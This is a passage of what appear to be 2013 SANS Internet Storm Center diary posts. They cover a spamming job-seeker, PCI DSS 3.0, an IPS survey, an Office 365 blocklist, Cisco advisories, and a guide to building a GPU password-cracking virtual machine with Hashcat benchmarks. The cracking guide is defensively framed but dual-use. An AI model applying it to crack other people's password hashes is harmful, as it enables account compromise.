
Here is the first part of the correspondence:

He is unapologetic and responds that he is being creative!

I wonder if they teach ethics in business at the place he acquired his MBA? What do you think? Creative or a spammer?
Would you hire or do business with a spammer? He appears to be in good company, has spamming become the new resume distribution method of choice?:
http://blog.dynamoo.com/2013/06/is-this-guy-moron-spammer.html

I find it depressing that the spammer appears to have in fact gotten a job roughly four weeks later. Well, according to his LinkedIn profile, so it must be true!

A recommended read on how to actually find a job without sending spam:
http://careers.theguardian.com/careers-blog/why-you-need-to-stop-spamming-employers

What is a 'Bernard Shifman':
http://web.archive.org/web/20030602190540/www.petemoss.com/spamflames/ShifmanIsAMoronSpammer.html

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.
My SANS Teaching Schedule

RIght on schedule (see their lifecycle doc at https://www.pcisecuritystandards.org/pdfs/pci_lifecycle_for_changes_to_dss_and_padss.pdf), the folks at PCI DSS have released a "what to expect" document for PCI 3.0.  I'm a bit late commenting on this - somehow I missed this when it was posted in August.  Specifically called out in the doc are:

• Lack of education and awareness
• Weak passwords, authentication
• Third-party security challenge
• Slow self-detection, malware
• Inconsistency in assessments

The change document is here: https://www.pcisecuritystandards.org/documents/DSS_and_PA-DSS_Change_Highlights.pdf

It'll be interesting to see what the final document will look like when it's released in November, and what happens when QSA's turn the PCI guidance into audit findings and recommendations.

==============
Rob VandenBrink
Metafore

Are you interested in where IPS Systems (Intrusion Prevention Systems) are going over the next few years?  Do you think we'll see more HIPs (Host Intrusion Prevention Systems) feeds into IPS consoles, or more integration with SIEMs?  Or will we just see better versions of what we have today?

Or are you maybe just wondering if your organization needs an IPS?

Either way, we're interested in our input!  We've got a survey running to collect your take on IPS's, and where you expect (or would like) to see them evolve over the next few years:   https://www.surveymonkey.com/s/2013SANSNetworkSecuritySurvey

We'll be collecting the results shortly, and will be sharing them in a SANS Analyst Webcast in October - more details here: https://www.sans.org/webcasts/survey-network-security-96967

Looking forward to your views !

===============
Rob VandenBrink
Metafore

With one "extracurricular" project winding up, I figured it was time to start the next one, and playing with the new crop of GPUs for hash and password cracking seems like a fun way to go.

At first glance, using specialized hardware like a GPU would mean that you'd be working in a physical machine, that using a VM is not in the cards.  Not so, it's actually pretty easy to make it fly in a VM, with a bit of planning.  For me, it also means that I don't need to find a spot for a new server.

First of all, you'll need a short list of "must haves":

• a Hypervisor that supports Vt-d - I'm using VMware ESXi (this is NOT something you want to try in Workstation)
• A motherboard and CPU that supports Vt-d.  I'm using a Tyan board and a XEON E3 processor.  
• Be sure that your system board will support PCIe x16 cards.  You don't need x16 throughput, even an x2 slot will do nicely, but it needs to be able to accept an x16 card (my board has an x8 slot)
• If you plan to use more than one GPU card, be sure the system board has enough slots, and that they are far enough apart (GPUs generally take 2 slots).  Also, with more cards, a tower configuration will tend to overheat the top card(s) - be sure  you have lots of fans in the case, and try to end up with the cards mounted vertically after all is said and done.
• Be sure you've got a power supply with lots of connectors and power - the card I ended up buying needed both an 8 pin and a 6 pin PCIe power connector.  I've got a 650Watt modular power supply to play with in this machine, so all is well.
• Finally, the right GPU.

For folks like me that are on a budget, there are two main choices in GPUs - NVIDIA and AMD. 

While both of these cards perform great for graphics, the AMD has and edge in crypto work - it seems to have better integer computing support, so tools like Hashcat or John the Ripper tend to run quicker.
In a virtual environment, the AMD cards seem to work better with Vt-d (called Device Passthrough in the ESXi interface).   If you want to use NVIDIA GPU's, you'll actually install drivers in ESXi, and you'll be confined to the most expensive NVIDIA cards (Quadro 6000, 5000, 4000, or the Tesla or Grid cards).  This is actually pretty cool, as you can spread the GPU's across multiple VM's for Virtual Desktop applications like CAD and the like.  But splitting the power of a GPU card across multiple VM's defeats the whole point of building a VM for cracking.

For my lab, I chose an AMD RADEON 7970 - it's got great processing power and it was on sale that week.  The 7900's seem to be right at the knee of the curve, right where more processing power starts to cost you disproportionally more money.

So, once all the prerequisites are in place, we're ready to go.

1/ First, install your card.  

2/ Next, over to ESXi, we'll need to enable Device Passthrough (Vt-d) for our new device.  You'll find this in Server Settings / Advanced / Edit.  Select the new card (which also selects the PCIe slot that it's in), and save.  You'll need to reboot the server after this done.

3/  Next, over to our VM.  We'll go to the "Edit Settings / Add Hardware" screen, and add this new PCI device.  Once this is done, vMotion and HA will no longer be possible for this VM, since it's tied to a specific PCIe slot in the server.  Even a cold migrate (migration with the VM powered off) will involve some jumping through hoops - removing the card, migrating then re-adding the card after the migrate (you'll of course need identical hardware on the destination server once the migration is complete)

4/ After installing the correct AMD driver in the VM, and we see our card!  I left the card at stock values for everything, nothing was overclocked or outside of the default settings.

5/ Next we'll need to install then the OpenCL SDK in the VM (Downloaded from AMD).

At this point, you'll be able to use the processing power of the GPU in any app written for it - I'm using Hashcat and John the Ripper, they both work great!

Running the hashcat benchmark (oclHashcat-lite64.exe -b) sees the card as a "Tahiti" (the codename for the 7900 series) gives us some really impressive numbers - for instance 8765.0M/s for MD5 (yes, that's in MILLION Hashes per second). While real throughput on the "no-lite" version will be slightly slower, these numbers are all pretty close to truth.

Just for fun, I installed the identical setup on a similar but PHYSICAL machine (3.5 GHz i7 quard core, as poosed to the 3.3 Ghz XEON quad in my ESXi server).  You can see from the table below that the throughput on hash calculations are very close, with the i7 setup a bit slower.  It's in situations like this where you'll see the features in "server class" processors make a difference - things like larger CPU cache for instance.  My ESXi server was running my kid's Minecraft server (with him and all his friends on it), plus we were streaming video off of another VM running DLNA services for our TV, and hashcat in the VM is still is consistently faster than the physical host running a workstation CPU of similar specs.

The numbers for both the physical and virtual and physical servers are shown below.  From this, we can draw a few critical conclusions:

• Hashing and encryption algorithms have worked well in the past, as CPU power has increased, we've been able to stay ahead of the curve with better encryption (DES followed by 3DES then AES for instance).  While you could always brute-force short strings like passwords, the additional computation involved in each successive algorithm meant that at any point in time, cracking the current algorithm on current hardware would take too long to be practical (unless you had nation-state budgets that is) - essentially this is Moore's Law in action. The power these new GPU cards bring to the table gives the hardware side of the equation a "leapfrog effect" - we're increasing the decryption capability by several orders of magnitude - by lots of zeros!.  And I'm not seeing a fundamental shift on the other side, no new "1,000 or 1,000,000 times harder" algorithm that makes it "difficult enough" to make brute forcing passwords impractical.  Our best defense today is longer passwords - this is an area where size does matter, and bigger is better.  But what's really needed is an alternative to passwords, or a whole other method of storing them.
• MD5 and SHA1 should no longer be used to store passwords, EVER - with this kind of throughput available to attackers with even minimal budgets, it's just too easy to crack these still commonly used algorithms.  You should be able to draw your own conclusions as to what's a better way to go (look towards the bottom of the list, or look at what's not on the list yet).
• PBKDF2 (RFC 2898) is not currently on HASHCAT's list of supported algorithms.  This new algorithm isn't widely deployed yet, but it goal is to "eat" a much higher number of compute cycles, making it ideal for password storage (especially if SHA256 is used instead of the default SHA1).  This may be our best bet for password storage, short term (I don't have benchmarks for it yet). We are however, seeing GPU support for this algorithm in John the Ripper.

===============
Rob VandenBrink
Metafore

A recent uptick in Port 14566 shows some activity over the past month, as shown in our DShield Report(1), however we have little information about what exactly is happening.  Some activity, then a lag near the end of August, followed by a large spike at the end, and the top port the past 24 hours, is curious.  A search of that port using Google and other security and traffic sites has yielded little, so if anybody has log files or activity of this port, we'd love to have a look.


(1)_https://isc.sans.edu/port.html?port=14566

tony d0t carothers --gmail

I recently migrated a client from a 10mbps internet uplink to a new 100mbps uplink with a wireless 10mbps backup.  As part of this, they of course got new IP addresses.

Like the thorough, some would say compulsive person I am, before we migrated I did all the right things:

• Tested both uplinks to make sure they were working
• Be sure that I had access to ISP support for both uplinks
• shortened the DNS TTL to ensure that when we migrated our DNS changes would propogate quickly
• Checked the IP addresses for SMTP Blocklisting (more on this later).

As expected, the migration went smoothly.  Until the next morning.   My client called me bright and early, with the news  "Our users can't send email to company XYZ".  After some wrangling and some time, I got the NDR (Non Delivery Report).  By then, we had identifed 3 other organizations that would not receive our emails.

The key line in the NDR was:
#< #5.7.1 smtp; 550 5.7.1 Service unavailable; Client host [x.x.x.x] blocked using Blocklist 1; To request removal from this list please forward this message to delist@messaging.microsoft.com> #SMTP#

How could this be?  These IP addresses hadn't been used in at least 6 months!

After a bit of digging (Google really does know all), we found that this is the blocklist service employed by Microsoft Office 365.  This service is unique amongst email blocklist services in that there is no way to check your status online, so me checking in advance with MXTOOLS, Solarwinds EE or any of the other usual tools had not done me a bit of good.

Anyway, we emailed the indicated address with our problem, and asked to be removed from the list.
It soon became apparant that this blocklist service was unique in another important way.  The users of the system of course thought that this email problem was our problem.   From our perspective, the solution to the problem had to be implemented by their mail provider.  The roadblock we had was that, as far as they blocklist was concerned, *they* were the Microosft customer, not us.  So as far as the blocklist admins were concerned, we were nobody.

So, like every other blocklist service under the sun, 6 hours went by, then 12, then 18, and still no word.  We ended up having to open a paid support ticket to get ourselves off a list we never should have been on in the first place.

What did I learn?  That cloud services aren't all sunshine and lolipops?  Umm, no, I already knew that.  That Murphy (as in Murphy's Law) is great at exploiting new features and services?  I thought I knew that too, I just though I had it covered (that'll teach me !! )

The important lesson I learned (aside from the "Murphy lesson") was to add one more check in any migrations that affect email - send a test note to anyone of Office 365.

Have you had similar experiences with email migrations?  Or other gotcha's you though you had 100% covered, but not so much?  Use our comment form to let us know what problems you ran into, and how you resolved them.

===============
Rob VandenBrink
Metafore

"Cisco Adaptive Security Appliance (ASA) Software contains a vulnerability that could allow an unauthenticated, remote attacker to fill the connection table in the ASA preventing new connections to be established through the device."[1]
"A vulnerability in the memory management when executing either the show monitor session all or show monitor session command-line interface (CLI) commands on the Cisco Unified Computing System (UCS) 6100 Series Fabric Interconnects could allow an authenticated, local attacker to trigger a memory leak."[2]
"A vulnerability in the Routing Information Protocol (RIP) process of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause the RIP process to crash."[3]
"A vulnerability in Web Administrator Interface of Cisco Wireless LAN Controllers (WLC) could allow an authenticated, remote attacker to cause a denial of service (DoS) condition."[4]

[1] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3463
[2] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3467
[3] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3470
[4] http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3474

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

The CD includes some new tools and updated scripts. It is available in two versions, 32-bit and 64-bit. The install.pdf document on how to install and configure the system is located in the rel_note directory.

Version 7.3 contains new tools, GUI and database: gulp, nfsen, SQueRT, ssdeep, PassiveDNS with database, Sagan, nfdump, rrdtool, rsyslog and pf_ring.

This page contains additional information, where to download the ISO and the documentation.

[1] http://handlers.dshield.org/gbruneau/shadow.htm

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu